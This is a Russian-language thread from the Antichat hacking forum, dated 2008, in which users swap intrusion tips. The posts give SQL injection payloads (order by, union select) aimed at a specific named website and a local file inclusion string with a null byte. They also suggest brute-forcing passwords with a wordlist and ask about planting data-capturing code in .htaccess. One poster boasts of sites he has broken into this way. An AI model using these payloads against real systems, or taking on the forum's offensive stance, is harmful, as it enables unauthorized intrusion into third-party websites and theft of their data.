Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

02.12.2008, 19:52
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме: 1325167
Репутация:
100
|
|
Работает ли php код в файлах .htpasswd и .htaccess?
Можно ли встроить туда свой код, чтобы перехватывались данные и сохранялись отдельным файлом?
Права на запись есть.
|
|
|

02.12.2008, 20:25
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме: 1404552
Репутация:
568
|
|
krypt3r
бред.. тот же самый результ изза ?
инклуд будет когда:
http://site.com/index.php?page=views&id=2
тогда:
http://site.com/index.php?page=..index.php%00&id=2
Octave_Parango
есть прога сипт.. качаеш мега словяк и вперед брутить..
Последний раз редактировалось sabe; 02.12.2008 в 20:27..
|
|
|

02.12.2008, 20:38
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме: 203452
Репутация:
36
|
|
Такой вопрос! Если есть сайт и на нем присутствует локальный инклуд! Как можно его раскрутить если на сайт загрузить ничего нельзя(ну по крайней мере такой функции нет в меню на сайта)!? Может есть какие-то пути? Или это просто нашел да и х*р с ним!?
|
|
|

02.12.2008, 20:57
|
|
Новичок
Регистрация: 18.11.2008
Сообщений: 28
Провел на форуме: 109973
Репутация:
15
|
|
пытался подставлять 1+order+by+1/* таже самая ошибка ... 1+order+by+5000000/* без изменений
пробуй +order+by+5000000 --
либо без плюсов, просто пробелы. Либо +group+by+1 -- и т.д.
|
|
|

02.12.2008, 21:11
|
|
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
Провел на форуме: 5365841
Репутация:
712
|
|
вобщем вот: http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,2,3,4--
а если вести http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,2,3,4/* , то уже совсем другое вылазиет)
полей вроде 4
+group+by+1 вроде ошибок нет)
что дальше делать ?)))
|
|
|

02.12.2008, 21:15
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме: 203452
Репутация:
36
|
|
http://cod5.nov.ru/serverstats.php?serverid=1+order+by+4-- - почувствуй разницу вот http://cod5.nov.ru/serverstats.php?serverid=1+order+by+5-- ???? НУ как??? А то хрень, что написал "Ghost0ff" все БРЕЕЕЕЕДДДД!!! Все делается Э Л Е М Е Н Т А Р Н О ! Можно и без group by !! Главное правильно поставить ' и - ! Практический все сайты которые я взломал, поддавались вот на такое http://site/index.php?page=-1+order+by+x
Нужно перед 1 поставить - ! Ну это обычно в твоем случае ничего ставить ненадо! Насчет поста "geforse" ты знаешь скорей самое простое это вообще ничего не ставить после "4" ))) Воть так http://cod5.nov.ru/serverstats.php?serverid=1+union+select+1,2,3,4 - удачи))
|
|
|

02.12.2008, 21:18
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме: 17668503
Репутация:
5826
|
|
Сообщение от BanQui
сайты которые я взломал, поддавались вот на такое http://site/index.php?page=-1+order+by+x
Нужно перед 1 поставить - !
И зачем так нужно делать? Особенно если учесть что это не правильно.
Так нужно делать только потому что ты не знаком с синтаксисом SQL?
Последний раз редактировалось Grey; 02.12.2008 в 21:20..
|
|
|

02.12.2008, 21:20
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме: 203452
Репутация:
36
|
|
Хммм в большенстве случаев этот вариант прокатывает!!!
|
|
|

02.12.2008, 21:21
|
|
Познающий
Регистрация: 10.07.2008
Сообщений: 70
Провел на форуме: 203452
Репутация:
36
|
|
Скул инж. я еще хоть как нить знаю но вот с PHP может кто нибуть поможет???
|
|
|

02.12.2008, 21:26
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме: 2584134
Репутация:
519
|
|
Почитай здесь:
http://forum.antichat.ru/thread12123.html
Последний раз редактировалось -m0rgan-; 02.12.2008 в 21:29..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|